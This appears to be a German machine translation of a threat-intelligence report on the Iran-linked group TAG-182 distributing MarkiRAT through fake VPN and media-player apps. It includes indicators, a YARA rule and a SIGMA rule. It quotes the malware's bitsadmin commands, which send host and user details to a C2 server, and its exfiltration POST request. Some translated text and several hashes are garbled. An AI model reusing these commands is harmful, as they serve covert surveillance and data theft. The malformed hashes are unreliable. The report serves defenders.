Iran-Nexus TAG-182 Disseminates MarkiRAT Surveillance Tool
Executive Summary
Die Insikt Group hat neue Infrastruktur identifiziert, die mit dem TAG-182-Bedrohungscluster verbunden ist und zur Verbreitung von MarkiRAT-Malware zur Unterstützung der iranischen Regierungsüberwachungsoperationen verwendet wird. Es ist sehr wahrscheinlich, dass TAG-182 Iraner im und außerhalb des Landes mit verschiedenen Ködern, darunter kostenlose Download-Tools und gefälschte VPN-Anwendungen, ins Visier nimmt. Die Aktivitäten der Gruppe sind höchstwahrscheinlich auf sozialen Medienplattformen wie Instagram aktiv.
Da der kinetische Konflikt mit den Vereinigten Staaten und Israel seit April 2026 nachgelassen hat, richtet Irans Sicherheitsapparat seinen Fokus wahrscheinlich auf verstärkte Cyberüberwachung und digitale Durchsetzungsoperationen, die sich gegen vermeintliche Dissidenten und mutmaßliche ausländische Kollaborateure richten. Die Aktivitäten von TAG-182 entsprechen diesen Sicherheitszielen und werden voraussichtlich auch nach der teilweisen Wiederherstellung des Internetzugangs im Iran am 26. Mai 2026 fortgesetzt. Die Indikatoren der Kompromiss (IoCs) für diesen Bericht sind in Anhang A einsehbar, während die Verteidigungssignaturen in Anhang C und Anhang D zu finden sind.
Wichtige Erkenntnisse
- TAG-182 ist sehr wahrscheinlich ein Bestandteil des umfassenderen iranischen Überwachungsökosystems und nutzt MarkiRAT-Malware, die über gefälschte Android-Anwendungen verbreitet wird, die sich als legitime Dienste wie VPNs und Medientools ausgeben, um Informationen von iranischen Zielen zu sammeln.
- Die während dieser Forschung identifizierte MarkiRAT-Stichprobe weist bemerkenswerte Handwerksüberschneidungen mit historischen Varianten auf, darunter die Nutzung des Background Intelligent Transfer Service (BITS), was auf eine glaubwürdige Beziehung zwischen TAG-182 und zuvor Ferocious Kitten zugeschriebenen Aktivitäten hindeutet. Obwohl diese Ähnlichkeiten eine operative Verbindung unterstützen, sind zusätzliche Belege erforderlich, um mit Sicherheit zu beurteilen, dass die beiden Cluster organisatorisch miteinander verbunden sind.
- Seit der Wiederanbindung Irans an das globale Internet ist es sehr wahrscheinlich, dass iranische Überwachungsoperationen zunehmen, da die Behörden versuchen, wahrgenommene Dissidenten zu identifizieren und zu überwachen, angesichts von Bedenken über innere Unruhen und mögliche Aufstände. Die Mehrheit der iranischen Geheimdienst- und Sicherheitsorganisationen wird voraussichtlich eine verbesserte digitale Überwachung und Informationssammlung priorisieren, um die inländischen Sicherheitsziele zu unterstützen.
Bedrohungsanalyse
Anfang 2026 tauchten Open-Quellen-Informationen Malware-Proben auf, die mit MarkiRAT in Verbindung stehen, das historisch von Ferocious Kitten zur Überwachung von regierungsfeindlichen Netzwerken, Aktivisten und Menschenrechtsaktivisten im Iran genutzt wurde. Die IoCs, insbesondere die Köder, deuten darauf hin, dass Bedrohungsakteur eine Website individuell gebaut haben, die als Ausgangspunkt für eine Anwendung namens "YESHICA" dient (Tabelle 1). Weitere Beispielnamen sind auch "Pis2ray VPN", das weder in Google Play noch im Apple App Store eine legitime Anwendung ist (siehe Anhang A für weitere IoCs).
Im März 2026 identifizierte die Insikt Group eine neue Stichprobe, die mit der aktualisierten Infrastruktur von TAG-182 verbunden ist und einen fast identischen Medienplayer-Themenamen verwendet, "YESHICA YEPlayer" (Abbildung 1).
YEPlayer.dllYEMPlayer.zipYEMPlayer.msiPis2rayVPN.msiPis2rayVPN.zipPis2rayN.dllTabelle 1: Malware-Proben, die mit der TAG-182-Bedrohungsaktivität (Quellen: Recorded Future, verbunden sind, Soziale Medien)
Infrastrukturanalyse
Die Analyse der TAG-182-Infrastruktur zeigt einen bemerkenswerten Cluster von Domains, die auf einem einzigen Server gehostet werden (Tabelle 2), bekannt gegeben von der 23M GmbH (AS47447). Dies wird höchst unwahrscheinlich das gesamte Ausmaß der Infrastruktur der Gruppe abdecken, da zusätzliche von Angreifern kontrollierte Assets ebenfalls auf Servern gehostet werden, die von CrownCloud (AS199959) verwaltet werden (Tabelle 3). TAG-182 verwendet überwiegend Let's Encrypt-Zertifikate in seinen Domänen und zeigt die Einführung vielfältiger Namenskonventionen, darunter "microsoft" (und "microsotf"), "download", "vpn", "google" und soziale Medien Einheit Namen wie "facebook".
Tabelle 2: Infrastruktur im Zusammenhang mit TAG-182-Bedrohungsaktivitäten (Quellen: Recorded Future)
Tisch 3: Infrastruktur höchstwahrscheinlich von TAG-182 kontrolliert (Quellen: Recorded Future)
MarkiRAT
Malware-Aktivitäten im Zusammenhang mit der MarkiRAT-Variante zeigen eine deutliche Überschneidung zwischen älteren und neueren Proben, wie beispielsweise durch die Background Intelligent Transfer Service (BITS)-Strings, die durch Malware Intelligence identifiziert wurden, belegt wird (Tabelle 4).
bitsadmin /cancel pdj
bitsadmin /create pdj
bitsadmin /resume pdj
bitsadmin /SetPriority pdj HIGH
bitsadmin /cancel pdj
bitsadmin /create pdj
bitsadmin /SetPriority pdj HIGH
bitsadmin /addfile pdj "hxxp[:]//microsotf[.]come-site[.]website/i.php?u=[computername]&i=proxy ip" %PUBLIC%AppData\Libs\p.bbitsadmin /addfile pdj "hxxp[:]//[C2 address]/i.php?u=[computername]-[username]&i=[proxy ip]"
%PUBLIC%\AppData\Libs\p.b
Tabelle 4: Vergleich von BITS-Jobs-Strings in TAG-182 und Ferocious Kitten MarkiRAT-Beispielen (Quellen: Recorded Future, Securelist)
Der Erstzugriff beinhaltet eine GET Anfrage zur hxxps://vip[.]yeplayer[.]speichern/files/YEPlayer[.]RAR, das die Nutzlast weiterhin liefert, selbst wenn die Seite einen Fehler zeigt, was auf ein gezieltes Staging-Verhalten hinweist. Nach Extraktion und Ausführung von YEPlayer.exe, Die Malware startet eine POST Anfrage an microsotf[.]comi-site[.]Website, eine bekannte bösartige Domäne, die einen Multipart-/Formulardaten-Upload nach /up/uploadx.php (Abbildung 5) verwendet, der mit seiner Beaconing-Aktivität verbunden ist.
Anfrage
POST /up/uploadx.php?u=RVUNOOXW_Admin HTTP/1.1
Host: microsotf[.]comi-site[.]Website
Inhaltstyp: Multipart/Formulardaten; boundary="aeeec4a1-13e1-4167-8902-73438c364aa9"
Inhaltslänge: 115665
Antwort
HTTP/1.1 200 OK
Datum: Mi, 06. Mai 2026 23:32:40 GMT
Server: Apache
Upgrade: h2,h2c
Verbindung: Upgrade
variieren: Accept-Encoding
Transfer-Encoding: chunked
Inhaltstyp: Text/HTML; charset=UTF-8
Abbildung 5: Beispiel für eine POST-Anfrage, die an microsotf gesendet wurde[.]comi-site[.]Website (Quellen: Recorded Future)
Eine weitere bemerkenswerte Überschneidung mit der Originalversion von MarkiRAT ist die Erkennung eines "svehost.exe” (imitiert svchost.exe) Datei, die erwartet, dass sie im Pfad AppData\Windows installiert wird. Wenn installiert, wird das Attribut versteckte Datei aus C:\Users\Public\AppData\Windows\svehost.exe der Verwendung attrib -hentfernt, wodurch die Datei sichtbar und leichter handhabbar ist.
Die Malware führt taskkill /im svehost.exe /t /fdann aus, was jeden laufenden Prozess, der benannt svehost.exe ist, und alle von ihr erzeugten Kindprozesse zwangsweise beendet. Die Sequenz ist wahrscheinlich darauf ausgelegt, die ausführbare Datei freizulegen und ihre laufende Instanz zu stoppen, damit MarkiRAT oder ein Betreiber sie ersetzen, aktualisieren, löschen oder neu starten kann.
Zielerfassung von persischsprachigen Nutzern
Open-Quellen-Informationen deuten darauf hin, dass TAG-182 weiterhin den Fokus darauf gelegt hat, persischsprachige Nutzer zum Download seiner gefälschten Anwendungen zu locken. So wurden beispielsweise in den Wochen nach den Straßenprotesten, die gegen Ende 2025 ausbrachen, auf Instagram Social-Media-Threads (einige wurden gelöscht) mit Ködern für Farsi-Sprecher identifiziert. Abbildung 6 zeigt einen Beitrag in sozialen Medien , der die Einführung von Pis2ray VPN bewirbt und die Aktivitäten der mutmaßlichen Administratoren hervorhebt, die Dienste kurz nach dem Ende des "internationalen Internets" (1, 2, 3) im Iran aktivierten. Die Gruppe verwendet spezifische Formulierungen und Begriffe, die sich als Plattform für interessierte regierungskritische Parteien tarnen.
Zuschreibung
Zum Zeitpunkt der Analyse ist die Verwendung von MarkiRAT mit Ferocious Kitten assoziiert. Dies schließt jedoch nicht aus, dass andere Bedrohungsgruppen im Iran dieselbe Malware sowie aktualisierte Varianten verwenden können. Es ist nahezu sicher, dass sich die Mehrheit der Ziele im Iran befindet oder mit iranischen regierungskritischen Bewegungen in Europa oder Nordamerika verbunden ist.
Da TAG-182 eindeutig mit MarkiRAT identifiziert wurde und fast sicher Iraner ins Visier nimmt, und da es ähnliche Infrastruktur-Tradecraft wie Ferocious Kitten nutzt, ist es zunehmend wahrscheinlich, dass die Gruppen miteinander verwandt sind. Während die Insikt Group die Malware von TAG-182 keiner bestimmten iranischen Sicherheitsorganisation zuordnen kann, ist TAG-182 fast sicher mit dem breiteren Bedrohungscluster pro-iranischer Cyberüberwachungsgruppen verbunden, die iranische Zivilisten und regierungskritische Netzwerke innerhalb und außerhalb des Irans ins Visier nehmen. Zu diesen Gruppen gehören GreenEcho (Domestic Kitten), Ferocious Kitten und Rampant Kitten, die alle wahrscheinlich eine Rolle bei der Unterstützung der digitalen Überwachung der Regierung spielen Kampagne
Jede Gruppe wird separat verfolgt und nutzt einzigartige Tradecrafts, spezifische Malware (MarkiRAT, FurBall, DCHSpy und BouldSpy) sowie Infrastruktur und ist fast ausschließlich der Unterstützung der iranischen Regierung und verbundenen Organisationen gewidmet. Dazu gehören das Islamische Revolutionsgardekorps (IRGC) und seine paramilitärische Hilfstruppe Basij sowie die iranische Cyberpolizei (FATA), die die iranische Straßen unterdrücken und durchsetzen.
Ausblick
Mit Blick auf die Zukunft, sofern nicht zu aktiven Konfliktbedingungen zurückkehrt, wird die iranische Regierung voraussichtlich durchsetzungsfähigere interne Sicherheitsmaßnahmen ergreifen, während sie gleichzeitig ihre diplomatische Haltung gegenüber den USA navigiert. Iranische Cyberüberwachungsteams sind Berichten zufolge während des Krieges aktiv geblieben, identifizierten Netzwerke von regierungskritischen Demonstranten und, wie in offenen Quellen berichtet, mutmaßliche ausländische Kollaborateure. Laut der Menschenrechtsorganisation Amnesty International nutzten die iranischen Behörden die Kriegsbedingungen, um ihre digitale Kontrolle während einer 88-tägigen Internetabschaltung zu festigen. Die Regierung soll Berichten zufolge "zwangsweise [Text]botschaften" gesendet haben, die "gewöhnliche Online-Aktivitäten als Frage der nationalen Sicherheit" darstellen und "diejenigen, die über VPNs oder Satellitenverbindungen auf das globale Internet zugreifen, mit Festnahmen, Strafverfolgung, Beschlagnahmung von Vermögenswerten und anderen Strafen nach dem Spionagegesetz drohen."
Mit der teilweisen Wiederherstellung des Internetzugangs am 26. Mai 2026 beleben Irans vielschichtige Cyberüberwachungsinstitutionen sehr wahrscheinlich digitale Überwachungsmaßnahmen, um regierungsfeindliche Stimmungen zu überwachen und eine schnelle Durchsetzung gegen Dissidenten zu ermöglichen. Die Internetwiederherstellung, die durch die Einrichtung einer präsidialen Sonderarbeitsgruppe umgesetzt wurde, die für die Beendigung des Stillstands stimmte, wurde von harten Elementen des Obersten Nationalen Sicherheitsrats (SNSC) und des Obersten Rates für Cyberspace (SCC), zwei der einflussreichsten politischen Gremien Irans für Sicherheit und Internetverwaltung, stark abgelehnt.
Angesichts des Streits über die Wiederherstellung des Internetzugangs unterstützen SNSC- und SCC-Hardliner wahrscheinlich die Aktivierung des iranischen inländischen Cyberüberwachungsapparats, der aus der IRGC, dem Basij Cyber Council, der FATA und dem Ministerium für Nachrichtendienste und Sicherheit (MOIS) besteht . Jede Organisation hat ihr eigenes Mandat innerhalb des digitalen Überwachungsökosystems der Regierung, von denen einige sich überschneiden und sogar konkurrieren, aber alle werden wahrscheinlich eine Rolle für die interne Stabilität nach Konflikten spielen, da Teheran sowohl seine physische Infrastruktur als auch seine innenpolitische Machtstruktur wiederaufbauen will. Das Malware-Schema von TAG-182 ist wahrscheinlich eines der zahlreichen Taktiken-, TTPs-, TTPs (TTPs), die von diesen Organisationen eingesetzt werden, um sicherzustellen, dass jegliche Gegner sowohl online als auch auf der Straße entdeckt werden.
Anhang A: Indikatoren für Kompromittierungen
Domains:
accountes[.]google[.]comesignt[.]website
accounts[.]google[.]comisignin[.]online
admin[.]google[.]com-accounts[.]website
admin[.]instagram[.]com-accounts[.]website
c[.]pis2ray[.]online
com-accounts[.]website
come-signin[.]quest
comesignt[.]website
comestore[.]site
comisignin[.]online
comx-view[.]store
download[.]yeplayer[.]store
google[.]com-accounts[.]website
google[.]com-signin[.]site
google[.]comisignin[.]online
host[.]comview[.]website
microsoft[.]pis2ray[.]online
microsoft[.]comesite[.]website
microsoft[.]come-site[.]website
microsoft[.]comi-site[.]website
microsoft[.]comview[.]website
microsotf[.]comi-site[.]website
miga[.]comesignt[.]website
migavpn[.]store
min[.]come-site[.]website
min[.]comi-site[.]website
min[.]comview[.]website
min[.]pis2ray[.]online
ns1[.]com-signin[.]site
ns2[.]com-signin[.]site
orbitx[.]site
pis2ray[.]online
prx[.]pis2ray[.]online
sahar2ray[.]online
starvpn[.]pis2ray[.]online
svpn[.]pis2ray[.]online
tools[.]sahar2ray[.]online
vip[.]yeplayer[.]store
vpn[.]pis2ray[.]online
webmail[.]com-accounts[.]website
webmail[.]facebook[.]com-accounts[.]website
webmail[.]google[.]com-accounts[.]website
webmail[.]instagram[.]com-accounts[.]website
www[.]facebook[.]com-accounts[.]website
www[.]google[.]com-accounts[.]website
www[.]instagram[.]com-accounts[.]website
www[.]pis2ray[.]online
www[.]yeplayer[.]store
www[.]yemplayer[.]site
yeplayer[.]store
yemplayer[.]site
IP Addresses:
45[.]86[.]162[.]197
46[.]30[.]191[.]105
46[.]30[.]191[.]123
89[.]144[.]145[.]237
89[.]144[.]145[.]239
212[.]83[.]61[.]198
SHA256 Hash:
13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5
400eb6a94810323a1fc5f8ab31c682fe765aaec2cc61b37c31d719c7e45c9a6c
51a6686b8c5ec7c610637398f3de43589f4e9fcbe8bcc0245343c5454d3b91de
66dcd98c6b310f4429890821e609d48cc6395a6be15ffe5a121ec68b7a8f7402
6c74d29903bc2cc17ec4afdb1a120d2060209b22830cee2b7005f5436e86f90e
8a7f5c8533df9e51b2da7cc2aeb52d8787418e4915577cc9288be1e46d1945c6
a4f1b79e96a7d016de1991a64506792018de99eac5df00f7cabe26ef41b2bd81
bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b
cc59bf019af195dcec4394ffd7a8e23c080f4e02b12dcb7c04fb1da6671922a1
ea755862ee81dd0d991b4afca42d8b82bb22a8f1d370bf3d28dbf2e44ab241dd
ea755862ee81dd0d991b4afca42d8b82bb22a8f1d370bf3d28dbf2e44ab241dd
fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347
Appendix B: MITRE ATT&CK Techniques
Anhang C: YARA-Regel
Regel APT_IR_TAG182_MarkiRAT_2
{
meta:
Autor = "Insikt Group, Recorded Future"
Datum = "2026-04-07"
Beschreibung = "Verfolgen Sie die Haupthintertür von TAG-182, MarkiRAT"
Version = "1.0"
Referenz = "https://x.com/ClearskySec/status/2016067892589023349"
hash = "13440348516ccee839675f6ac908DD1724ce1d28f92af92fdc7938740d2b7ec5"
hash = "bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b"
hash = "fa246327bed8fc5864827a8147b8b7aedb62444b6244 6068259b8c97e82adb957315347"
hash = "3b172281f65ceaee280ae810edb6fd39a1ecd25649f929f246c05df944f4c89"
hash = "f7bde19f9e085650378076dabac586dcdc256e743a578900000e71a71a7ebb43d8ee"
malware = "MarkiRAT"
malware_id = "iRjG1u"
Actor = "TAG-182"
actor_id = "BKMf7Fc"
Kategorie = "MALWARE"
Zeichenketten:
$url 1 = "/i.php?u=" ascii wide
$url 2 = "/uploadx.php?u=" ascii wide
$scr 1 = "CaptureAndSendScreenshotAsync" ascii wide
$scr 2 = "\\scr.jpg" ascii wide
$dir = "C:\\Users\\Public" ascii wide
Bedingung:
uint16(0) == 0x5a4d
und jede von ($url*)
und jede von ($scr*)
und $dir
}
Anhang D: SIGMA-Regel
Titel: MarkiRAT Malware Bitsadmin Datei Download
id: c7f01654-afdf-4fce-96f8-6c0a405370c2
Status: stabil
Beschreibung: Erkennt die Verwendung von bitsadmin zum Herunterladen einer Datei von einer entfernten URL durch MarkiRAT-Malware, die von Iran-Nexus TAG-182 verwendet wird.
Quellen:
- https://tria.ge/250622-fcp2eaak8t
Autor: Insikt Group, Recorded Future
Datum: 07.05.2026
Tags:
- attack.t1197 # BITS Jobs
- attack.t1059.003 # Command and Scripting Interpreter: Windows Command Shell
logsource:
Produkt: Windows
Kategorie: process_creation
Erkennung:
bitsadmin_download:
CommandLine|enthält|alle:
- 'bitsadmin'
- '/addfile'
markirat_urls:
CommandLine|enthält:
- '/i.php?u='
- '/uploadx.php?u='
Bedingung: bitsadmin_download und markirat_urls
Niveau: hoch
Falsepositives:
- Unwahrscheinlich